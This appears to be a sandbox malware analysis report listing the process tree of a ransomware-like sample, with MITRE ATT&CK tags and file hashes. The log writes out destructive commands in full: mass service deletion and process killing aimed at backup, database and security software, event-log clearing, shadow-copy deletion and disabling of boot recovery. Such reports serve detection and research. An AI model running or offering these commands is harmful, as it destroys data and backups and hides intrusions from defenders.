C:\Windows\SysWOW64\sc.exesc delete qemu-ga4⤵PID:4028
-
C:\Windows\SysWOW64\sc.exesc delete AlibabaProtect4⤵PID:920
-
C:\Windows\SysWOW64\sc.exesc delete ZTEVdservice4⤵PID:1248
-
C:\Windows\SysWOW64\sc.exesc delete kbasesrv4⤵PID:3108
-
C:\Windows\SysWOW64\sc.exesc delete MMRHookService4⤵PID:4136
-
C:\Windows\SysWOW64\sc.exesc delete OracleJobSchedulerORCL4⤵PID:4428
-
C:\Windows\SysWOW64\sc.exesc delete IpOverUsbSvc4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1136 -
C:\Windows\SysWOW64\sc.exesc delete MsDtsServer1004⤵PID:764
-
C:\Windows\SysWOW64\sc.exesc delete KuaiYunTools4⤵
- Launches sc.exe
PID:4092 -
C:\Windows\SysWOW64\sc.exesc delete KMSELDI4⤵PID:1964
-
C:\Windows\SysWOW64\sc.exesc delete btPanel4⤵PID:1228
-
C:\Windows\SysWOW64\sc.exesc delete Protect_2345Explorer4⤵
- Launches sc.exe
PID:628 -
C:\Windows\SysWOW64\sc.exesc delete 2345PicSvc4⤵PID:1936
-
C:\Windows\SysWOW64\sc.exesc delete vmware-converter-agent4⤵PID:4672
-
C:\Windows\SysWOW64\sc.exesc delete vmware-converter-server4⤵PID:1960
-
C:\Windows\SysWOW64\sc.exesc delete vmware-converter-worker4⤵PID:3828
-
C:\Windows\SysWOW64\sc.exesc delete QQCertificateService4⤵PID:3376
-
C:\Windows\SysWOW64\sc.exesc delete OracleRemExecService4⤵PID:4552
-
C:\Windows\SysWOW64\sc.exesc delete GPSDaemon4⤵
- Launches sc.exe
PID:220 -
C:\Windows\SysWOW64\sc.exesc delete GPSUserSvr4⤵PID:4556
-
C:\Windows\SysWOW64\sc.exesc delete GPSDownSvr4⤵PID:2348
-
C:\Windows\SysWOW64\sc.exesc delete GPSStorageSvr4⤵PID:3828
-
C:\Windows\SysWOW64\sc.exesc delete GPSDataProcSvr4⤵
- Launches sc.exe
PID:3120 -
C:\Windows\SysWOW64\sc.exesc delete GPSGatewaySvr4⤵PID:4924
-
C:\Windows\SysWOW64\sc.exesc delete GPSMediaSvr4⤵PID:3336
-
C:\Windows\SysWOW64\sc.exesc delete GPSLoginSvr4⤵PID:4672
-
C:\Windows\SysWOW64\sc.exesc delete GPSTomcat64⤵PID:2092
-
C:\Windows\SysWOW64\sc.exesc delete GPSMysqld4⤵PID:3696
-
C:\Windows\SysWOW64\sc.exesc delete GPSFtpd4⤵PID:4488
-
C:\Windows\SysWOW64\sc.exesc delete "Zabbix Agent"4⤵PID:1548
-
C:\Windows\SysWOW64\sc.exesc delete BackupExecAgentAccelerator4⤵
- Launches sc.exe
PID:404 -
C:\Windows\SysWOW64\sc.exesc delete bedbg4⤵PID:3336
-
C:\Windows\SysWOW64\sc.exesc delete BackupExecDeviceMediaService4⤵PID:1940
-
C:\Windows\SysWOW64\sc.exesc delete BackupExecRPCService4⤵PID:4688
-
C:\Windows\SysWOW64\sc.exesc delete BackupExecAgentBrowser4⤵PID:4556
-
C:\Windows\SysWOW64\sc.exesc delete BackupExecJobEngine4⤵PID:3504
-
C:\Windows\SysWOW64\sc.exesc delete BackupExecManagementService4⤵PID:4540
-
C:\Windows\SysWOW64\sc.exesc delete MDM4⤵
- Suspicious use of AdjustPrivilegeToken
PID:996 -
C:\Windows\SysWOW64\sc.exesc delete TxQBService4⤵PID:508
-
C:\Windows\SysWOW64\sc.exesc delete Gailun_Downloader4⤵PID:5100
-
C:\Windows\SysWOW64\sc.exesc delete RemoteAssistService4⤵PID:412
-
C:\Windows\SysWOW64\cmd.execmd /c "color e & @taskkill /IM BackupExec.exe /F & @taskkill /IM Att.exe /F & @taskkill /IM mdm.exe /F & @taskkill /IM BackupExecManagementService.exe /F & @taskkill /IM bengine.exe /F & @taskkill /IM benetns.exe /F & @taskkill /IM beserver.exe /F & @taskkill /IM pvlsvr.exe /F & @taskkill /IM bedbg.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM RemoteAssistProcess.exe /F & @taskkill /IM BarMoniService.exe /F & @taskkill /IM GoodGameSrv.exe /F & @taskkill /IM BarCMService.exe /F & @taskkill /IM TsService.exe /F & @taskkill /IM GoodGame.exe /F & @taskkill /IM BarServerView.exe /F & @taskkill /IM IcafeServicesTray.exe /F & @taskkill /IM BsAgent_0.exe /F & @taskkill /IM ControlServer.exe /F & @taskkill /IM DisklessServer.exe /F & @taskkill /IM DumpServer.exe /F & @taskkill /IM NetDiskServer.exe /F & @taskkill /IM PersonUDisk.exe /F & @taskkill /IM service_agent.exe /F & @taskkill /IM SoftMemory.exe /F & @taskkill /IM BarServer.exe /F & @taskkill /IM RtkNGUI64.exe /F & @taskkill /IM Serv-U-Tray.exe /F & @taskkill /IM QQPCSoftTrayTips.exe /F & @taskkill /IM SohuNews.exe /F & @taskkill /IM Serv-U.exe /F & @taskkill /IM QQPCRTP.exe /F & @taskkill /IM EasyFZS.exe /F & @taskkill /IM HaoYiShi.exe /F & @taskkill /IM HysMySQL.exe /F & @taskkill /IM wtautoreg.exe /F & @taskkill /IM ispiritPro.exe /F & @taskkill /IM CAService.exe /F & @taskkill /IM XAssistant.exe /F & @taskkill /IM TrustCA.exe /F & @taskkill /IM GEUU20003.exe /F & @taskkill /IM CertMgr.exe /F & @taskkill /IM eSafe_monitor.exe /F & @taskkill /IM MainExecute.exe /F & @taskkill /IM FastInvoice.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM sesvc.exe /F & @taskkill /IM ScanFileServer.exe /F & @taskkill /IM Nuoadehgcgcd.exe /F & @taskkill /IM OpenFastAssist.exe /F & @taskkill /IM FastInvoiceAssist.exe /F & @taskkill /IM Nuoadfaggcje.exe /F & @taskkill /IM OfficeUpdate.exe /F & @taskkill /IM atkexComSvc.exe /F & @taskkill /IM FileTransferAgent.exe /F & @taskkill /IM MasterReplicatorAgent.exe /F & @taskkill /IM CrmAsyncService.exe /F & @taskkill /IM CrmAsyncService.exe /F & @taskkill /IM CrmUnzipService.exe /F & @taskkill /IM NscAuthService.exe /F & @taskkill /IM ReplicaReplicatorAgent.exe /F & @taskkill /IM ASMCUSvc.exe /F & @taskkill /IM OcsAppServerHost.exe /F & @taskkill /IM RtcCdr.exe /F & @taskkill /IM IMMCUSvc.exe /F & @taskkill /IM DataMCUSvc.exe /F & @taskkill /IM MeetingMCUSvc.exe /F & @taskkill /IM QmsSvc.exe /F & @taskkill /IM RTCSrv.exe /F & @taskkill /IM pnopagw.exe /F & @taskkill /IM NscAuth.exe /F & @taskkill /IM Microsoft.ActiveDirectory.WebServices.exe /F & @taskkill /IM DistributedCacheService.exe /F & @taskkill /IM c2wtshost.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Calculation.exe /F & @taskkill /IM schedengine.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Eventing.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Queuing.exe /F & @taskkill /IM WSSADMIN.EXE /F & @taskkill /IM hostcontrollerservice.exe /F & @taskkill /IM noderunner.exe /F & @taskkill /IM OWSTIMER.EXE /F & @taskkill /IM wsstracing.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM MySQLInstallerConsole.exe /F & @taskkill /IM EXCEL.EXE /F & @taskkill /IM consent.exe /F & @taskkill /IM RtkAudioService64.exe /F & @taskkill /IM RAVBg64.exe /F & @taskkill /IM FNPLicensingService64.exe /F & @taskkill /IM VisualSVNServer.exe /F & @taskkill /IM MotionBoard57.exe /F & @taskkill /IM MotionBoardRCService57.exe /F & @taskkill /IM LPManService.exe /F & @taskkill /IM RaRegistry.exe /F & @taskkill /IM RaAutoInstSrv.exe /F & @taskkill /IM RtHDVCpl.exe /F & @taskkill /IM DefenderDaemon.exe /F & @taskkill /IM BestSyncApp.exe /F & @taskkill /IM ApUI.exe /F & @taskkill /IM AutoUpdate.exe /F & @taskkill /IM LPManNotifier.exe /F & @taskkill /IM FieldAnalyst.exe /F & @taskkill /IM TimingGenerate.exe /F & @taskkill /IM Detector.exe /F & @taskkill /IM Estimator.exe /F & @taskkill /IM FA_Logwriter.exe /F & @taskkill /IM TrackingSrv.exe /F & @taskkill /IM cbInterface.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM ccbService.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM dbsrv16.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM KICManager.exe /F & @taskkill /IM KICMain.exe /F & @taskkill /IM ServerManagerLauncher.exe /F & @taskkill /IM TbossGate.exe /F & @taskkill /IM iusb3mon.exe /F & @taskkill /IM MgrEnvSvc.exe /F & @taskkill /IM Mysoft.Config.WindowsService.exe /F & @taskkill /IM Mysoft.UpgradeService.UpdateService.exe /F & @taskkill /IM hasplms.exe /F & @taskkill /IM Mysoft.Setup.InstallService.exe /F & @taskkill /IM Mysoft.UpgradeService.Dispatcher.exe /F & @taskkill /IM Mysoft.DataCenterService.WindowsHost.exe /F & @taskkill /IM Mysoft.DataCenterService.DataCleaning.exe /F & @taskkill /IM Mysoft.DataCenterService.DataTracking.exe /F & @taskkill /IM Mysoft.SchedulingService.WindowsHost.exe /F & @taskkill /IM ServiceMonitor.exe /F & @taskkill /IM Mysoft.SchedulingService.ExecuteEngine.exe /F & @taskkill /IM AgentX.exe /F & @taskkill /IM host.exe /F & @taskkill /IM AutoUpdate.exe /F & @taskkill /IM vsjitdebugger.exe /F"3⤵PID:2324
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM BackupExec.exe /F4⤵PID:4144
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM Att.exe /F4⤵PID:1136
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM mdm.exe /F4⤵PID:3648
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM BackupExecManagementService.exe /F4⤵PID:4828
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM bengine.exe /F4⤵PID:2280
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM benetns.exe /F4⤵PID:4976
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM beserver.exe /F4⤵PID:3992
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM pvlsvr.exe /F4⤵PID:1492
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM bedbg.exe /F4⤵PID:2960
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM beremote.exe /F4⤵PID:4020
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM beremote.exe /F4⤵
- Kills process with taskkill
PID:4500 -
C:\Windows\SysWOW64\taskkill.exetaskkill /IM beremote.exe /F4⤵PID:2476
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM beremote.exe /F4⤵PID:208
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM RemoteAssistProcess.exe /F4⤵PID:2004
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM BarMoniService.exe /F4⤵PID:4388
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM GoodGameSrv.exe /F4⤵PID:4632
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM BarCMService.exe /F4⤵PID:5100
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TsService.exe /F4⤵PID:2104
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM GoodGame.exe /F4⤵PID:1276
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM BarServerView.exe /F4⤵
- Kills process with taskkill
PID:1428 -
C:\Windows\SysWOW64\taskkill.exetaskkill /IM IcafeServicesTray.exe /F4⤵PID:952
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM BsAgent_0.exe /F4⤵PID:4092
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ControlServer.exe /F4⤵PID:1856
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM DisklessServer.exe /F4⤵PID:2112
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM DumpServer.exe /F4⤵PID:636
-
C:\Windows\SysWOW64\cmd.execmd /c "color e & @taskkill /IM VBoxSDS.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM TeamViewer_Service.exe /F & @taskkill /IM TeamViewer.exe /F & @taskkill /IM CasLicenceServer.exe /F & @taskkill /IM tv_w32.exe /F & @taskkill /IM tv_x64.exe /F & @taskkill /IM rdm.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM SecureCRTPortable.exe /F & @taskkill /IM VirtualBox.exe /F & @taskkill /IM VBoxSVC.exe /F & @taskkill /IM VirtualBoxVM.exe /F & @taskkill /IM abs_deployer.exe /F & @taskkill /IM edr_monitor.exe /F & @taskkill /IM sfupdatemgr.exe /F & @taskkill /IM ipc_proxy.exe /F & @taskkill /IM edr_agent.exe /F & @taskkill /IM edr_sec_plan.exe /F & @taskkill /IM sfavsvc.exe /F & @taskkill /IM DataShareBox.ShareBoxMonitorService.exe /F & @taskkill /IM DataShareBox.ShareBoxService.exe /F & @taskkill /IM Jointsky.CloudExchangeService.exe /F & @taskkill /IM Jointsky.CloudExchange.NodeService.ein /F & @taskkill /IM perl.exe /F & @taskkill /IM java.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM TsServer.exe /F & @taskkill /IM AppMain.exe /F & @taskkill /IM easservice.exe /F & @taskkill /IM Kingdee6.1.exe /F & @taskkill /IM QyKernel.exe /F & @taskkill /IM QyFragment.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM ComputerZTray.exe /F & @taskkill /IM ComputerZService.exe /F & @taskkill /IM ClearCache.exe /F & @taskkill /IM ProLiantMonitor.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM bugreport.exe /F & @taskkill /IM GNWebServer.exe /F & @taskkill /IM UI0Detect.exe /F & @taskkill /IM GNCore.exe /F & @taskkill /IM gnwayDDNS.exe /F & @taskkill /IM GNWebHelper.exe /F & @taskkill /IM php-cgi.exe /F & @taskkill /IM ESLUSBService.exe /F & @taskkill /IM CQA.exe /F & @taskkill /IM Kekcoek.pif /F & @taskkill /IM Tinuknx.exe /F & @taskkill /IM servers.exe /F & @taskkill /IM ping.exe /F & @taskkill /IM TianHeng.exe /F & @taskkill /IM K3MobileService.exe /F & @taskkill /IM VSSVC.exe /F & @taskkill /IM Xshell.exe /F & @taskkill /IM XshellCore.exe /F & @taskkill /IM FNPLicensingService.exe /F & @taskkill /IM XYNTService.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM EISService.exe /F & @taskkill /IM UFSoft.U8.Framework.EncryptManager.exe /F & @taskkill /IM yonyou.u8.gc.taskmanager.servicebus.exe /F & @taskkill /IM U8KeyManagePool.exe /F & @taskkill /IM U8MPool.exe /F & @taskkill /IM U8SCMPool.exe /F & @taskkill /IM UFIDA.U8.Report.SLReportService.exe /F & @taskkill /IM U8TaskService.exe /F & @taskkill /IM U8TaskWorker.exe /F & @taskkill /IM U8WebPool.exe /F & @taskkill /IM U8AllAuthServer.exe /F & @taskkill /IM UFIDA.U8.UAP.ReportService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.Services.exe /F & @taskkill /IM U8WorkerService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.exe /F & @taskkill /IM ShellStub.exe /F & @taskkill /IM U8UpLoadTask.exe /F & @taskkill /IM UfSysHostingService.exe /F & @taskkill /IM UFIDA.UBF.SystemManage.ApplicationService.exe /F & @taskkill /IM UFIDA.U9.CS.Collaboration.MailService.exe /F & @taskkill /IM NotificationService.exe /F & @taskkill /IM UBFdevenv.exe /F & @taskkill /IM UFIDA.U9.SystemManage.SystemManagerClient.exe /F & @taskkill /IM mongod.exe /F & @taskkill /IM SpusCss.exe /F & @taskkill /IM UUDesktop.exe /F & @taskkill /IM KDHRServices.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.Mobile.Servics.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM KDSvrMgrService.exe /F & @taskkill /IM pdfServer.exe /F & @taskkill /IM pdfspeedup.exe /F & @taskkill /IM SufAppServer.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.K3.Mobile.LightPushService.exe /F & @taskkill /IM iMTSSvcMgr.exe /F & @taskkill /IM kdmain.exe /F & @taskkill /IM KDActMGr.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM K3ServiceUpdater.exe /F & @taskkill /IM Aua.exe /F & @taskkill /IM iNethinkSQLBackup.exe /F & @taskkill /IM auaJW.exe /F & @taskkill /IM Scheduler.exe /F & @taskkill /IM bschJW.exe /F & @taskkill /IM SystemTray64.exe /F & @taskkill /IM OfficeDaemon.exe /F & @taskkill /IM OfficeIndex.exe /F & @taskkill /IM OfficeIm.exe /F & @taskkill /IM iNethinkSQLBackupConsole.exe /F & @taskkill /IM OfficeMail.exe /F & @taskkill /IM OfficeTask.exe /F & @taskkill /IM OfficePOP3.exe /F & @taskkill /IM apache.exe /F & @taskkill /IM GnHostService.exe /F /T & @taskkill /IM HwUVPUpgrade.exe /F /T & @taskkill /IM "Kingdee.KIS.UESystemSer.exe" /F /T & @taskkill /IM uvpmonitor.exe /F /T & @taskkill /IM UVPUpgradeService.exe /F /T & @taskkill /IM KDdataUpdate.exe /F /T & @taskkill /IM Portal.exe /F /T & @taskkill /IM U8SMSSrv.exe /F /T & @taskkill /IM "Ufida.T.SM.PublishService.exe" /F /T & @taskkill /IM lta8.exe /F /T & @taskkill /IM UfSvrMgr.exe /F /T & @taskkill /IM AutoUpdateService.exe /F /T & @taskkill /IM MOM.exe /F /T"3⤵PID:4616
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM VBoxSDS.exe /F4⤵
- Suspicious use of AdjustPrivilegeToken
PID:64 -
C:\Windows\SysWOW64\taskkill.exetaskkill /IM mysqld.exe /F4⤵
- Suspicious use of AdjustPrivilegeToken
PID:608 -
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TeamViewer_Service.exe /F4⤵
- Kills process with taskkill
PID:208 -
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TeamViewer.exe /F4⤵PID:920
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM CasLicenceServer.exe /F4⤵PID:220
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM tv_w32.exe /F4⤵PID:1928
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM tv_x64.exe /F4⤵PID:4760
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM rdm.exe /F4⤵
- Kills process with taskkill
PID:1404 -
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SecureCRT.exe /F4⤵PID:4004
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SecureCRTPortable.exe /F4⤵PID:1340
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM VirtualBox.exe /F4⤵PID:2092
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM VBoxSVC.exe /F4⤵PID:4036
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM VirtualBoxVM.exe /F4⤵PID:4808
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM abs_deployer.exe /F4⤵PID:4688
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM edr_monitor.exe /F4⤵PID:4656
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sfupdatemgr.exe /F4⤵PID:1944
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ipc_proxy.exe /F4⤵PID:1936
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM edr_agent.exe /F4⤵PID:4392
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM edr_sec_plan.exe /F4⤵PID:3564
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sfavsvc.exe /F4⤵PID:2296
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM DataShareBox.ShareBoxMonitorService.exe /F4⤵PID:1516
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM DataShareBox.ShareBoxService.exe /F4⤵PID:3668
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM Jointsky.CloudExchangeService.exe /F4⤵PID:1408
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM Jointsky.CloudExchange.NodeService.ein /F4⤵PID:2304
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM perl.exe /F4⤵PID:2196
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM java.exe /F4⤵PID:2952
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM emagent.exe /F4⤵PID:3604
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TsServer.exe /F4⤵
- Kills process with taskkill
PID:1200 -
C:\Windows\SysWOW64\taskkill.exetaskkill /IM AppMain.exe /F4⤵
- Kills process with taskkill
PID:4672 -
C:\Windows\SysWOW64\taskkill.exetaskkill /IM easservice.exe /F4⤵
- Kills process with taskkill
PID:1928 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WEVTUTIL EL3⤵PID:4004
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL EL4⤵PID:4916
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "AMSI/Debug"3⤵PID:5000
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "AirSpaceChannel"3⤵PID:4268
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Analytic"3⤵PID:952
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Application"3⤵PID:4880
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "DirectShowFilterGraph"3⤵PID:508
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "DirectShowPluginControl"3⤵
- Clears Windows event logs
PID:4880 -
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Els_Hyphenation/Analytic"3⤵PID:1004
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "EndpointMapper"3⤵PID:1924
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "FirstUXPerf-Analytic"3⤵PID:4540
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "ForwardedEvents"3⤵PID:4808
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "General Logging"3⤵PID:4644
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "HardwareEvents"3⤵PID:1856
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "IHM_DebugChannel"3⤵PID:1084
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Intel-iaLPSS-GPIO/Analytic"3⤵PID:1408
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Intel-iaLPSS-I2C/Analytic"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3648 -
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Intel-iaLPSS2-GPIO2/Debug"3⤵PID:1148
-
C:\Users\Admin\AppData\Local\Temp\a-Yaoofdkgd.exeC:\Users\Admin\AppData\Local\Temp\a-Yaoofdkgd.exe2⤵
- Checks computer location settings
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:548 -
C:\Windows\system32\vssadmin.exe"C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3652 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe3⤵
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Windows\SysWOW64\sc.exesc delete "MSSQLFDLauncher"4⤵PID:3816
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures3⤵PID:4384
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no3⤵PID:1664
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3428
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop XenSvc1⤵PID:3768
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeIS1⤵PID:4300
Network
MITRE ATT&CK Enterprise v6
Defense Evasion
File Deletion
2File and Directory Permissions Modification
1Impair Defenses
1Indicator Removal on Host
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5328207b7a801dda3ea8f7a87e4fd10f4
SHA1a1c3972c3158c5ca56089043c4452cf07e8229af
SHA25642e5076fa7339d2efa8e18e71c330b5c558dcb054bb252a72c8983e7fddcbde9
SHA512c3d9ac2ec2951d23907dbf06fe3cd09e48cafa5964bbe2f309d4a7a2b273e1d78d8b3013e8336c8e492e468760c9eced0649c7d2f357c3f7dbe796a1b1eb912e
-
Filesize
1KB
MD5328207b7a801dda3ea8f7a87e4fd10f4
SHA1a1c3972c3158c5ca56089043c4452cf07e8229af
SHA25642e5076fa7339d2efa8e18e71c330b5c558dcb054bb252a72c8983e7fddcbde9
SHA512c3d9ac2ec2951d23907dbf06fe3cd09e48cafa5964bbe2f309d4a7a2b273e1d78d8b3013e8336c8e492e468760c9eced0649c7d2f357c3f7dbe796a1b1eb912e
-
Filesize
53KB
MD5b57545cb36ef6a19fdde4b2208ebb225
SHA11d319740835ff12562e04cc74545a047bba63031
SHA256445d709ea4ae38706a0cc47ffc6c100fb9a354ff1ac718d0c23415524bdfc895
SHA5123618bb17282d8d82ff280590563eebd5c0b181d24156f6a69cba53d17a1bae0d9287c9f191efbe6c3d4223bcb47348c74177000aa0844263ed176df56e1f0856